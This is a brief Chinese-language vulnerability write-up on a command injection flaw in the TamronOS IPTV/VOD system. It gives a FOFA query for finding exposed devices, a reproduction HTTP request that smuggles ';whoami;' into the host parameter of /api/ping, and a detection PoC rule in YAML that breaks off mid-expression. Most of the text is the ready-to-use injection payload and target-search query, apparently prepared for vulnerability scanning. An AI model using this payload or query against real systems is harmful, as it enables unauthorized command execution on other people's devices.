产品简介
TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案。系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。
漏洞描述
TamronOS IPTV 存在系统命令注入漏洞。
fofa
app=”TamronOS-IPTV系统”
漏洞复现
POST /api/ping?count=5&host=;whoami; HTTP/1.1
Host:
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0
检测poc规则编写
params: []
name: TamronOS IPTV系统存在命令执行漏洞
set: {}
rules:
- method: GET
path: /api/ping?count=5&host=;whoami;
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.bod